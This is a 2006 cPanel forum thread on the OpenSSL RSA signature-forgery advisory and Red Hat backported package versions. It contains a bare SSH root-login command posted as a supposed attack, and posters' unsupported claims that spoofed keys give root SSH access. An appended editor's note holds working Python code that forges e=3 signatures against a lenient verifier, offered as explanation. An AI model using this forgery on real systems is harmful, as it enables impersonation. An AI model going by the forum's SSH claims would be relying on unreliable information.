The Community Forums

Interact with an entire community of cPanel & WHM users!

OpenSSL Security Advisory [5th September 2006]

Discussion in 'Security' started by Domenico, Sep 8, 2006.

  1. Domenico

    Domenico Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    362
    Likes Received:
    0
    Trophy Points:
    16
    #1 Domenico, Sep 8, 2006
    Last edited: Sep 8, 2006
  2. eXite

    eXite Well-Known Member

    Joined:
    May 16, 2003
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    DataCenter Provider
    This is just simply incomprehensible: even after updating OpenSSL to the latest version (manually compiling), cPanel still tries to undo the changes. Look what happens when I recompile apache:

    ---

    Warning !! openssl-devel has been modified... reinstalling....Setting up Install Process
    Setting up repositories
    Reading repository metadata in from local files
    Excluding Packages in global exclude list
    Finished
    Parsing package install arguments
    Resolving Dependencies
    --> Populating transaction set with selected packages. Please wait.
    ---> Package openssl-devel.i586 0:0.9.7a-43.10 set to be updated
    --> Running transaction check

    Dependencies Resolved

    =============================================================================
    Package Arch Version Repository Size
    =============================================================================
    Installing:
    openssl-devel i586 0.9.7a-43.10 base 1.6 M

    ---

    What the **** is this? What kind of repo is CentOS using here...? The 2003 openssl version came straight out of Redhat 9, so this is just great.
     
  3. eXite

    eXite Well-Known Member

    Joined:
    May 16, 2003
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    DataCenter Provider
    Well, I'm able to skip the openssl updating process by adding it to the exclude list in /etc/yum.conf, but still, it's ridiculous that everybody is still using some ancient version by default...
     
  4. forlinuxsupport

    forlinuxsupport Well-Known Member
    PartnerNOC

    Joined:
    Dec 22, 2004
    Messages:
    386
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Submit it as a bug request to cPanel so they can update theirs :)
     
  5. Domenico

    Domenico Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    362
    Likes Received:
    0
    Trophy Points:
    16
    Really, you can log in as root to someone's box easily, so cPanel guys, please fix asap.
     
  6. Bdzzld

    Bdzzld Well-Known Member

    Joined:
    Apr 3, 2004
    Messages:
    356
    Likes Received:
    1
    Trophy Points:
    18
    Hi Domenico,

    I've read about this subject too on the Dutch WHT (I've another nick there).
    Have you personally tried to "hack" into your own cPanel server without using a root password? I believe cPanel is using an altered version of OpenSSL.

    Regards.
     
  7. driverC

    driverC Well-Known Member

    Joined:
    Jul 23, 2004
    Messages:
    112
    Likes Received:
    0
    Trophy Points:
    16
    On Red Hat distributions like Fedora, CentOS or Red Hat Enterprise the OpenSSL version number is not correct. That is because Red Hat is using a custom version of OpenSSL. Even though it appears to be old and insecure, it is a new and safe version. If you update it manually you will **** things up and you may break dependencies. Red Hat doesn't like custom versions of OpenSSL at all. For example, after I did update OpenSSL manually, attempts to update Apache failed completely. I had to copy the openssl file from another Red Hat server and add it to the new server. So I think/hope you can forget about OpenSSL not being safe. It is just because Red Hat distributions are using their own version of OpenSSL with an incorrect old version number, as far as I understand it.
     
    #7 driverC, Sep 8, 2006
    Last edited: Sep 8, 2006
  8. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    I don't think this has anything to do with cPanel; openssl is updated by the OS.

    I tried to update openssl with yum to openssl-0.9.7a-43.11 (the latest version it seems) on CentOS 4.3 and 4.4, but it says it has nothing to update.
     
  9. Domenico

    Domenico Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    362
    Likes Received:
    0
    Trophy Points:
    16
    We know this has nothing to do with cPanel but all of our cPanel boxes have the same 'old' version;

    openssl version
    OpenSSL 0.9.7a Feb 19 2003

    Upgrading to the latest version has no use since the daily cPanel update process puts the old version back.

    Can someone from the cPanel team please react? Nick?
     
  10. rachweb

    rachweb Well-Known Member

    Joined:
    Jun 26, 2004
    Messages:
    268
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    amsterdam

    The best way is to open a support ticket.
     
  11. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Why using 'openssl version' to determine your version is pointless has already been pointed out in this thread by driverC

    You could try this to see which version you have installed:

    Code:
    root@host [~]# rpm -qa openssl
    openssl-0.9.7a-43.10
    
    You can check for which platforms CentOS has released openssl-0.9.7a-43.11 here:
    http://lists.centos.org/pipermail/centos-announce/2006-September/thread.html
     
  12. eXite

    eXite Well-Known Member

    Joined:
    May 16, 2003
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    DataCenter Provider
    Open /etc/yum.conf and add "OpenSSL*" to the exclude list. Then manually compile the new openssl version and you're good to go.
     
  13. eXite

    eXite Well-Known Member

    Joined:
    May 16, 2003
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    DataCenter Provider
    Well, nothing is corrupted here:

    # openssl version
    OpenSSL 0.9.8c 05 Sep 2006

    # rpm -qa | grep openssl
    openssl-0.9.7a-43.10

    43.10, what the hell is that supposed to mean. How am I supposed to know how the patchlevel reflects vulnerability?
     
  14. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    By reading the release info maybe, and looking at the release date? I gave you a link to the centos archive; all the info you need is there. Of course, if you prefer to manually compile and update all your software then you're free to do so...
     
  15. teakwood

    teakwood Active Member

    Joined:
    Jul 8, 2006
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Sydney
    You want my ip so you can show me how it's done? :rolleyes:
     
  16. Domenico

    Domenico Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    362
    Likes Received:
    0
    Trophy Points:
    16
    ~$ ssh root@yourdomain/ip -p22 -i id_dsa_badcert

    If you want to know more just look at the right places or ask these guys on webhostingtalk.nl -> http://www.webhostingtalk.nl/direct...ico-openssl.html?highlight=openssl#post760972

    Anyways, I know how to update but the trick is doing it without breaking a cPanel box and that is something you just don't know for sure. :eek:
     
  17. teakwood

    teakwood Active Member

    Joined:
    Jul 8, 2006
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Sydney
    That's your theory, I asked you to come and prove it. :D

    Have you done it, or have you seen it done?

    (Even if your imaginary attack worked, that line won't work against my servers anyway . . . :) )

    I note yum has already updated OpenSSL on my CentOS 3 boxes, but not the CentOS 4 ones yet.

    I don't see how cPanel has anything to do with the issue, you should be hitting the forums of your OS supplier.
     
  18. mctDarren

    mctDarren Well-Known Member

    Joined:
    Jan 6, 2004
    Messages:
    664
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    New Jersey
    cPanel Access Level:
    Root Administrator
    This is a known exploit that is mentioned on the OpenSSL website:

    I sent out to my customers, should work for you too in RHEL/CentOS Env:
    I believe that will protect against the exploit and keep it from reverting back to the older version...
     
  19. teakwood

    teakwood Active Member

    Joined:
    Jul 8, 2006
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Sydney
    Can anyone tell me exactly how this bug can be used to attack a server?

    Don't tell me what you've read. Don't tell me what your guess is. Tell me something you know.
     
  20. mctDarren

    mctDarren Well-Known Member

    Joined:
    Jan 6, 2004
    Messages:
    664
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    New Jersey
    cPanel Access Level:
    Root Administrator
    Lol, "don't tell me what you've read"? I think most people have only read about this and haven't seen it used or tried to break in to a system using it. What's the hostility about with this issue? ;)

    Openssl patched things because they were shown how a spoofed RSA gave someone root access to a server that was running the old version. Of course, if you still use a root login to access your server then you should be perfectly fine. But if you're using Identity/Pubkey access it's disastrous. It means anyone using a spoofed key can access your server. My understanding is that it only works with keys with exponents of 3. But why bother taking a chance when you can upgrade without much trouble and avoid what might be a bad situation?

    Anyway, people are right that this has nothing to do with cPanel other than the fact that on nightly update the /scripts/sysup run will probably overwrite your custom compile of the latest version with the patched version provided by your OS repos.
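Editor's note on the "spoofed RSA" forgery discussed above, as an added example that is not from the original thread, from cPanel or from OpenSSL. The 5th September 2006 advisory (CVE-2006-4339) concerned PKCS#1 v1.5 signature verification that checked the leading `00 01 FF..FF 00 DigestInfo HASH` bytes and ignored whatever followed. With a public exponent of 3 an attacker can then pick a value whose plain integer cube starts with exactly those bytes and ends in garbage; no private key is involved, only the victim's public modulus, which is why the trick works against anyone's e=3 key. The script below forges such a signature and runs it through two parsers modelled on the unpatched and patched behaviour (the parsers are this example's own, not OpenSSL's code); the 2048-bit modulus is a constructed stand-in, labelled as such, since the forgery never reduces modulo n and any odd n with its top bit set behaves identically.

```python
"""Bleichenbacher-style e=3 forgery against a lenient PKCS#1 v1.5 verifier (added example)."""
import hashlib

# DER DigestInfo prefix for SHA-1: SEQUENCE { AlgorithmIdentifier(sha1), OCTET STRING(20) }
DIGESTINFO_SHA1 = bytes.fromhex("3021300906052b0e03021a05000414")
E = 3


def iroot3(x: int) -> int:
    """Largest r with r**3 <= x, by binary search (hi starts strictly above the root)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def demo_modulus(bits: int = 2048) -> int:
    """Constructed stand-in for an e=3 public modulus (NOT a real RSA key, assumption of
    this example). The forgery never uses a private key and its cube stays below n, so
    any odd n with the top bit set gives the same result as a real key would."""
    raw = b"".join(hashlib.sha256(b"demo-modulus-%d" % i).digest() for i in range(bits // 256))
    return int.from_bytes(raw, "big") | (1 << (bits - 1)) | 1


def parse_lenient(em: bytes, digest: bytes) -> bool:
    """Unpatched-style check: walk 00 01 FF..FF 00 DigestInfo HASH, never look past the hash."""
    if len(em) < 11 or em[0] != 0x00 or em[1] != 0x01:
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= len(em) or em[i] != 0x00:  # require the minimum 8 bytes of 0xFF
        return False
    i += 1
    if em[i:i + len(DIGESTINFO_SHA1)] != DIGESTINFO_SHA1:
        return False
    i += len(DIGESTINFO_SHA1)
    return em[i:i + len(digest)] == digest  # trailing bytes are ignored: the bug


def parse_strict(em: bytes, digest: bytes) -> bool:
    """Patched-style check: rebuild the single valid encoding and compare the whole block."""
    pad_len = len(em) - 3 - len(DIGESTINFO_SHA1) - len(digest)
    expected = b"\x00\x01" + b"\xff" * pad_len + b"\x00" + DIGESTINFO_SHA1 + digest
    return em == expected


def verify(n: int, sig: int, digest: bytes, parser) -> bool:
    """RSA verification with e=3: recover EM = sig^3 mod n, hand it to the chosen parser."""
    k = (n.bit_length() + 7) // 8
    if not 0 < sig < n:
        return False
    em = pow(sig, E, n).to_bytes(k, "big")
    return parser(em, digest)


def forge(n: int, digest: bytes) -> int:
    """Find s whose cube is 00 01 FF*8 00 DigestInfo HASH followed by arbitrary garbage.
    Only the public modulus size is needed. The garbage region must be wider than the
    spacing between consecutive cubes (about two thirds of the modulus length), which
    is why the 46-byte SHA-1 prefix fits a 2048-bit key but not a 1024-bit one."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + DIGESTINFO_SHA1 + digest
    garbage_bits = 8 * (k - len(prefix))
    lo = int.from_bytes(prefix, "big") << garbage_bits
    hi = lo + (1 << garbage_bits) - 1
    s = iroot3(hi)
    assert lo <= s ** 3 <= hi < n, "modulus too small for this prefix"
    return s


def run_demo() -> dict:
    n = demo_modulus()
    msg = b"constructed sample message: issuer says this certificate is fine"  # constructed
    digest = hashlib.sha1(msg).digest()
    s = forge(n, digest)
    return {
        "lenient_accepts_forgery": verify(n, s, digest, parse_lenient),
        "strict_accepts_forgery": verify(n, s, digest, parse_strict),
        "forged_sig_hex": format(s, "x"),
    }


if __name__ == "__main__":
    r = run_demo()
    print("lenient parser accepts forgery:", r["lenient_accepts_forgery"])
    print("strict parser accepts forgery: ", r["strict_accepts_forgery"])
```

Two practical points follow from the code. First, what a forged signature buys an attacker depends entirely on what the relying software does with it (a certificate chain that is now "valid", a signed message that is now "authentic"); the forgery itself grants nothing, so the exposure of any particular service comes down to whether its verifier checked the whole padded block. Second, on the Red Hat side the question jamesbond raised is answered by the package changelog rather than by `openssl version`: `rpm -q --changelog openssl | grep -i 2006-4339` shows whether the backported build carries the fix, which the `0.9.7a` banner never will.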
     